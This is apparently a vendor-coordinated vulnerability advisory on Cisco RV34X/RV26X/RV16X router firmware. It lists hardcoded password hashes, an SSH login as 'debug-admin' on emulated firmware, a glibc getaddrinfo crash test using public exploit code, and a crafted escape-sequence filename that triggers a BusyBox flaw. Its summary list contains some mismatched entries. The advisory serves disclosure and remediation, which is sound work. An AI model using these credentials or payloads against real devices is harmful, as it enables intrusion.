Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X

Project Description

The router series RV34X, RV26X und RV16X from Cisco are affected by multiple vulnerabilities resulting from old software components embedded in the firmware. Hardcoded password hashes and credentials were also found by doing an automated scan with IoT Inspector. According to Cisco, these hashes cannot be used for real interactions with the device though. Two vulnerabilities (CVE-2015-7547 and CVE-2017-16544) were verified by emulating the device with the MEDUSA scaleable firmware runtime.


Vendor description

“Securely connecting your small business to the outside world is as important as connecting your internal network devices to one another. Cisco Small Business RV Series Routers offer virtual private networking (VPN) technology so your remote workers can connect to your network through a secure Internet pathway.

Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html 

Business recommendation

SEC Consult wants to thank Cisco for the very quick and professional response and great coordination. Customers are urged to update the firmware of their devices.

 

Vulnerability overview/description

1) Hardcoded Credentials

The device contains hardcoded users and passwords which can be used to login via SSH on an emulated device at least. During the communication with Cisco it turned out that:
Accounts like the ‘debug-admin’ and ‘root’ can not be accessed from console port, CLI or webui“. Therefore, these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities

The used GNU glibc in version 2.19 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-7547, “getaddrinfo() buffer overflow”) was verified by using the MEDUSA scalable firmware runtime.

3) Known BusyBox Vulnerabilities

The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scaleable firmware runtime.

4) Multiple Vulnerabilities – IoT Inspector Report

Further information can be found in IoT Inspector Report: https://r.sec-consult.com/ciscoiot

Proof of concept

1) Hardcoded Credentials

The following hardcoded hashes were found in the ‘shadow’ file of the firmware:

root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:99999:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:99999:7:::
[...]

The undocumented user ‘debug-admin’ is also contained in this file. Starting the dropbear daemon as background process on emulated firmware:

# dropbear -E
# [1109]  Running in background
#
# [1112]  Child connection from :52718
[1112]  /var must be owned by user or root, and not writable by others
[1112]  Password auth succeeded for 'debug-admin' from :52718

Log on via another host connected to the same network. For this PoC the password of the debug-admin was changed in the ‘shadow’ file.

[root@localhost medusa]# ssh debug-admin@ /bin/ash -i
debug-admin@'s password: 
/bin/ash: can't access tty; job control turned off

BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

/tmp $

The ‘debug-admin’ user has the same privileges like ‘root’. This can be determined from the corresponding sudoers file in the firmware:

[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that: “Accounts like the ‘debug-admin’ and ‘root’ can not be accessed from console port, CLI or webui“. Therefore, these accounts had no real functionality and cannot be used for malicious actions.

2) Known GNU glibc Vulnerabilities

GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, CVE-2015-5277, CVE-2015-8778, CVE-2015-8779, CVE-2017-1000366 and more.

The getaddrinfo() buffer overflow vulnerability was checked with the help of the exploit code from https://github.com/fjserna/CVE-2015-7547. It was compiled and executed on the emulated device to test the system.

# python cve-2015-7547-poc.py &
[1] 961
# chroot /medusa_rootfs/ bin/ash


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

# gdb cve-2015-7547_glibc_getaddrinfo 
[...]
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
Connected with 127.0.0.1:41782
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
[TCP] Request2 len recv 36
Cannot access memory at address 0x4

Program received signal SIGSEGV, Segmentation fault.
0x76f1fd58 in ?? () from /lib/libc.so.6
(gdb)

 

References:

3) Known BusyBox Vulnerabilities

BusyBox version 1.23.2 contains multiple CVEs like: CVE-2016-2148, CVE-2016-6301, CVE-2015-9261, CVE-2016-2147, CVE-2018-20679, CVE-2017-16544 and CVE-2019-5747.
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device:

A file with the name \ectest\n\e]55;test.txt\a was created to trigger the vulnerability.

# ls "pressing "
test
]55;test.txt  
#

4) Multiple Vulnerabilities – IoT Inspector Report

Further information can be found in IoT Inspector report: https://r.sec-consult.com/ciscoiot

The summary is below:

IoT Inspector Vulnerability #1 BusyBox CVE entries
Outdated BusyBox version is affected by 7 published CVEs.

IoT Inspector Vulnerability #2 curl CVE entries
Outdated curl version is affected by 35 published CVEs.

IoT Inspector Vulnerability #3 GNU glibc CVE entries
Outdated GNU glibc version is affected by 44 published CVEs.

IoT Inspector Vulnerability #4 GNU glibc getaddrinfo() buffer overflow
Outdated GNU glibc version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #5 Hardcoded password hashes
Firmware contains multiple hardcoded credentials.

IoT Inspector Vulnerability #6 Linux Kernel CVE entries
Outdated Linux Kernel version affected by 512 published CVEs.

IoT Inspector Vulnerability #7 MiniUPnPd CVE entries
Outdated MiniUPnPd version affected by 2 published CVEs.

IoT Inspector Vulnerability #8 Dnsmasq CVE entries
Outdated MiniUPnPd version affected by 1 published CVE.

IoT Inspector Vulnerability #9 Linux Kernel Privilege Escalation “pp_key”
Outdated Linux Kernel version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #10 OpenSSL CVE entries
Outdated OpenSSL version affected by 6 published CVEs.

Vulnerable / tested versions:

The following firmware versions have been tested with IoT Inspector and firmware emulation techniques:

  • Cisco RV340 / 1.0.02.16
  • Cisco RV340W / 1.0.02.16
  • Cisco RV345 / 1.0.02.16
  • Cisco RV345P / 1.0.02.16

The following firmware versions have been tested with IoT Inspector only:

  • Cisco RV260 / 1.0.00.15
  • Cisco RV260P / 1.0.00.15
  • Cisco RV260W / 1.0.00.15
  • Cisco RV160 / 1.0.00.15
  • Cisco RV160P / 1.0.00.15

The firmware was obtained from the vendor website:

 

Vendor contact timeline

2019-05-15Contacting vendor through psirt@cisco.com.
2019-05-16Vendor confirmed the receipt.
2019-05 – 2019-08Periodic updates about the investigation from the vendor. Clarification which of the reported issues will be fixed.
2019-08-20The vendor proposed the next possible publication date for the advisory for 2019-09-04. The vendor added the RV160 and RV260 router series to be vulnerable to the same issues too.
2019-09-04Coordinated advisory release.

Solution

Upgrade to the newest available firmware version.

Additionally, the vendor provides the following security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190904-sb-vpnrouter 

Workaround

None.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF Thomas Weber / @2019

 

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult?
Contact our local offices.

Project Details

  • TitleMultiple vulnerabilities
  • ProductCisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, Cisco 160W
  • Vulnerable versionCisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
  • Fixed versionsee Solution
  • CVE number-
  • ImpactHigh
  • Homepagehttps://www.cisco.com/
  • Found2019-05-15
  • ByT. Weber, S. Viehböck (Office Vienna) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back